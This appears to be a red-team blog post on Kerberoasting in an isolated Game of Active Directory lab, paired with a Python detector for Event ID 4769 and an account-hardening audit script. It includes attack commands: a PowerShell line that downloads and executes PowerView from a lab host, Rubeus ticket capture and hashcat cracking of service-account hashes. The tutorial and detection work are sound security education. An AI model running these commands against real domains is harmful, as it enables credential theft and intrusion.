Red Team

Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab

By Equipe Basilisk

Ethical Kerberoasting walkthrough on Game of Active Directory: TGS capture, offline crack with hashcat, and detection via Event ID 4769.

Kerberoasting still kills domains in 2026 because teams keep spinning up Service Accounts with weak passwords and SPNs registered on DCs without enforced MFA. In our Game of Active Directory (GOAD v3) lab, it took roughly 14 minutes from an initial shell on a sevenkingdoms.local member box to cracking a SQL Server service account password with hashcat running on an RTX 4070. This post documents the full walkthrough, from PowerView enumeration to the Sigma rule that catches the attack inside the Blue Team's ELK stack. Everything is isolated, snapshotted, and nowhere near someone else's production.

Before touching GOAD, replicate the lab segmentation described in Web Pentesting From Scratch: Building a Safe Lab with DVWA, Juice Shop and Burp Suite so your network is properly isolated, and review OPSEC for Security Researchers: Building a Personal Threat Model to avoid leaking artifacts from your workstation. Our GOAD runs on three VMs with 6 GB RAM each (DC01, DC02, SRV02), plus a dedicated Kali box with 8 GB on vmnet9. Use Mayfly277's official Ansible playbook; it provisions in around 45 minutes on a decent machine. Confirm the Windows firewall is permissive internally; otherwise you will be debugging RPC issues instead of studying Kerberos.

Enumeration starts after initial access. Assume you already hold low-privilege credentials obtained via the techniques covered in Simulated Initial Access: Macros, LNK and ISO in an Isolated Windows 11 Lab, in our case jaime.lannister:cersei. We load PowerView.ps1 with `IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerView.ps1')` and run `Get-DomainUser -SPN | select samaccountname, serviceprincipalname`. Three accounts come back: sqlsvc, httpsvc, backupsvc. The natural target is sqlsvc, because MSSQL service accounts frequently started life with short passwords in 2018-era install scripts. Rubeus.exe is our capture tool: `Rubeus.exe kerberoast /nowrap /outfile:hashes.txt /user:sqlsvc`.

The encrypted part of the returned TGS is keyed with the service account's NT hash when the ticket uses RC4-HMAC (etype 23), which is still the case in most labs and, unfortunately, in plenty of production environments. Grab hashes.txt, ship it to Kali via SMB or curl, and feed it to hashcat: `hashcat -m 13100 hashes.txt rockyou.txt -r rules/best64.rule`. At 2 minutes 11 seconds the password SQLSvc@2018 fell. If you want to try bigger wordlists or rule sets, OneRuleToRuleThemStill is solid, but start basic. To correlate with adjacent AD techniques, see Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus and especially Windows Persistence: 10 Documented Techniques and Their Countermeasures for what comes after this stage.

On the Blue Team side, Kerberoasting is not silent when you know where to look. Event ID 4769 on the DC logs every service ticket issued, and a Ticket Encryption Type of 0x17 (RC4-HMAC) is already a yellow flag in modern environments with AES enabled. The Sigma rule I wrote watches 4769 events with a TicketEncryptionType of 0x17 or 0x18, groups them by requesting account in a 60-second window, and fires when five or more distinct SPNs are requested. That cuts the noise from legitimate applications. For more on instrumentation, Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule shows how to stand up the pipeline with Filebeat and Elastic, and Hunting Living-off-the-Land Binaries on Windows with KQL covers adjacent detections for Defender for Identity.
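The rule logic just described, run over constructed 4769 records as an added example (this is not code from the original post and not the team's Sigma rule). It keeps only RC4 tickets (0x17 or 0x18), tracks per-account requests in a sliding window, and alerts when an account reaches the distinct-service threshold. Window and threshold are parameters, so the 5-minute / more-than-4 variant from the takeaway at the end of the post runs through the same function, together with the allowlist cross-check mentioned there. Field names follow the Windows Security log 4769 XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the events, the `scanner.svc` account, and the service names beyond the three the post lists are constructed.

```python
"""Sliding-window Kerberoasting detector over Event ID 4769 records.

Added example, not code from the original post. Only tickets whose
TicketEncryptionType is 0x17 or 0x18 (RC4) are considered, events are grouped
by the requesting account, and one alert is raised when an account requests
THRESHOLD or more distinct services inside a WINDOW-long sliding window.
Note that 4769 records the service account name (ServiceName), which stands
in for the SPN in the distinct count. All sample data below is constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}      # RC4-HMAC and RC4-HMAC-EXP as logged in 4769
WINDOW = timedelta(seconds=60)     # rule from the text: 60-second window
THRESHOLD = 5                      # rule from the text: >= 5 distinct SPNs


def _ev(ts, user, service, etype, ip="::ffff:10.0.0.50"):
    """Build one 4769-like record (constructed sample data)."""
    return {"TimeCreated": ts, "EventID": 4769, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "IpAddress": ip}


JAIME = "jaime.lannister@SEVENKINGDOMS.LOCAL"
ARYA = "arya.stark@SEVENKINGDOMS.LOCAL"
SCANNER = "scanner.svc@SEVENKINGDOMS.LOCAL"   # constructed: a known vulnerability scanner

# jaime requests six RC4 tickets for five distinct services in 11 seconds (one
# repeat); arya touches two RC4 services minutes apart; the scanner also trips
# the threshold and is the kind of account that belongs on an allowlist.
SAMPLE_EVENTS = [
    _ev("2026-01-10T09:00:01", JAIME, "sqlsvc", "0x17"),
    _ev("2026-01-10T09:00:03", JAIME, "httpsvc", "0x17"),
    _ev("2026-01-10T09:00:04", JAIME, "sqlsvc", "0x17"),          # repeat, not a new SPN
    _ev("2026-01-10T09:00:05", JAIME, "backupsvc", "0x17"),
    _ev("2026-01-10T09:00:08", JAIME, "ftpsvc", "0x17"),          # constructed service
    _ev("2026-01-10T09:00:12", JAIME, "printsvc", "0x17"),        # constructed service
    _ev("2026-01-10T09:00:20", ARYA, "DC01$", "0x12", "::ffff:10.0.0.61"),    # AES, ignored
    _ev("2026-01-10T09:03:00", ARYA, "httpsvc", "0x17", "::ffff:10.0.0.61"),
    _ev("2026-01-10T09:04:30", ARYA, "sqlsvc", "0x17", "::ffff:10.0.0.61"),
    _ev("2026-01-10T09:10:00", SCANNER, "sqlsvc", "0x17", "::ffff:10.0.0.9"),
    _ev("2026-01-10T09:10:01", SCANNER, "httpsvc", "0x17", "::ffff:10.0.0.9"),
    _ev("2026-01-10T09:10:02", SCANNER, "backupsvc", "0x17", "::ffff:10.0.0.9"),
    _ev("2026-01-10T09:10:03", SCANNER, "ftpsvc", "0x17", "::ffff:10.0.0.9"),
    _ev("2026-01-10T09:10:04", SCANNER, "printsvc", "0x17", "::ffff:10.0.0.9"),
]


def detect_kerberoast(events, window=WINDOW, threshold=THRESHOLD,
                      etypes=RC4_ETYPES, allowlist=()):
    """Return one alert dict per account that crosses the threshold.

    allowlist: account names (case-insensitive) that are expected to request
    many service tickets, e.g. a scanner; they are skipped entirely.
    """
    allow = {a.lower() for a in allowlist}
    recent = defaultdict(deque)    # account -> deque of (time, service) inside the window
    alerts, fired = [], set()
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):   # ISO strings sort by time
        if ev.get("EventID") != 4769:
            continue
        if str(ev.get("TicketEncryptionType", "")).lower() not in etypes:
            continue
        user = ev["TargetUserName"].lower()
        if user in allow or user in fired:
            continue
        now = datetime.fromisoformat(ev["TimeCreated"])
        q = recent[user]
        q.append((now, ev["ServiceName"].lower()))
        while now - q[0][0] > window:         # evict requests older than the window
            q.popleft()
        distinct = {svc for _, svc in q}
        if len(distinct) >= threshold:
            fired.add(user)                   # one alert per account per run
            alerts.append({
                "user": user,
                "first_seen": q[0][0].isoformat(),
                "last_seen": now.isoformat(),
                "source_ip": ev.get("IpAddress"),
                "services": sorted(distinct),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS, allowlist=[SCANNER]):
        print(alert)
```

With the defaults the detector alerts on both jaime.lannister and scanner.svc; passing the scanner on the allowlist leaves only the first, and raising the threshold to six silences both, since the repeated sqlsvc request is not counted twice.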

Practical mitigation is layered. First, migrate every service account to Group Managed Service Accounts (gMSA) with automatic 30-day rotation, which closes the window in which an offline crack is still useful. Second, force AES256_HMAC_SHA1 by clearing RC4 in the account's msDS-SupportedEncryptionTypes (value 0x18). Third, audit monthly with `Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties PasswordLastSet, msDS-SupportedEncryptionTypes` and flag any account whose password is older than 90 days. Fourth, add any admin account that owns an SPN to the Protected Users group. For complementary endpoint hardening, Windows 11 Hardening for High-Risk Offensive Security Workstations covers the administrator workstation.
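An audit pass for the second and third steps above, written as an added example (not code from the original post). It decodes the msDS-SupportedEncryptionTypes bitmask so that "0x18" is shown to mean AES128 plus AES256 and nothing else, flags accounts that still permit RC4 or have the attribute unset, and flags passwords older than 90 days. The records are constructed and mirror the properties the `Get-ADUser` query in the text returns; the `IsGmsa` field and the account names other than the three the post lists are assumptions so that gMSA accounts, which rotate their own passwords, can be exempted from the age check.

```python
"""Audit of SPN-bearing accounts for RC4 still being permitted and for stale
passwords. Added example, not code from the original post; the records are
constructed. A real run would load an export of the Get-ADUser query from the
text (JSON or CSV) instead of the inline list.
"""
from datetime import datetime, timedelta, timezone

# Bit flags of msDS-SupportedEncryptionTypes.
ENC_FLAGS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
RC4_HMAC = 0x04
AES_ONLY = 0x18                                    # AES128 | AES256, the value the text recommends
MAX_PASSWORD_AGE = timedelta(days=90)
NOW = datetime(2026, 1, 10, tzinfo=timezone.utc)   # fixed clock so results are reproducible

# Constructed records. None for msDS-SupportedEncryptionTypes means the
# attribute is unset, as on many accounts created before AES was the norm.
# IsGmsa is an assumed field marking Group Managed Service Accounts.
SAMPLE_ACCOUNTS = [
    {"SamAccountName": "sqlsvc", "msDS-SupportedEncryptionTypes": None,
     "PasswordLastSet": datetime(2018, 6, 1, tzinfo=timezone.utc), "IsGmsa": False},
    {"SamAccountName": "httpsvc", "msDS-SupportedEncryptionTypes": 0x1C,      # RC4 + AES128 + AES256
     "PasswordLastSet": datetime(2025, 12, 20, tzinfo=timezone.utc), "IsGmsa": False},
    {"SamAccountName": "backupsvc", "msDS-SupportedEncryptionTypes": AES_ONLY,
     "PasswordLastSet": datetime(2025, 9, 1, tzinfo=timezone.utc), "IsGmsa": False},
    {"SamAccountName": "gmsa_sql$", "msDS-SupportedEncryptionTypes": AES_ONLY,  # constructed gMSA
     "PasswordLastSet": datetime(2025, 12, 28, tzinfo=timezone.utc), "IsGmsa": True},
]


def decode_enctypes(value):
    """Return the names of the encryption types enabled by the bitmask (empty if unset)."""
    value = value or 0
    return [name for bit, name in ENC_FLAGS.items() if value & bit]


def audit_account(acct, now=NOW, max_age=MAX_PASSWORD_AGE):
    """Return the findings for one account; an empty list means it passes."""
    findings = []
    value = acct.get("msDS-SupportedEncryptionTypes")
    if not value:
        # Unset or 0: the KDC applies its domain-wide default, which still
        # permits RC4 unless the DC has been hardened, so treat it as RC4-capable.
        findings.append("enctypes unset: KDC default applies, RC4 likely allowed; set to 0x18")
    elif value & RC4_HMAC:
        findings.append("RC4 enabled (%s); set to 0x18 for AES only" % ", ".join(decode_enctypes(value)))
    # A gMSA rotates its own password (30 days by default), so age is not a finding there.
    if not acct.get("IsGmsa"):
        age = now - acct["PasswordLastSet"]
        if age > max_age:
            findings.append("password %d days old (> %d); rotate or migrate to gMSA"
                            % (age.days, max_age.days))
    return findings


def audit(accounts, now=NOW):
    """Map each SamAccountName to its list of findings."""
    return {a["SamAccountName"]: audit_account(a, now) for a in accounts}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        print(name, "OK" if not findings else findings)
```

On the constructed data sqlsvc gets both findings (unset encryption types and a password from 2018), httpsvc is flagged only for RC4, backupsvc only for a 131-day-old password, and the gMSA passes cleanly.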

Practical takeaway: stand up a SIEM alert today that fires when a single account requests more than 4 distinct RC4 Service Tickets in 5 minutes, then cross-check it against an allowlist of expected service accounts. Two hours of work, and it would have caught 8 of every 10 real Kerberoasting attacks that appeared in public IR reports in 2025. Document the playbook, drill the team against the locally reproduced GOAD, and revisit posture every time a new SPN is created in the domain. Without that, your next headache may come from exactly this vector.
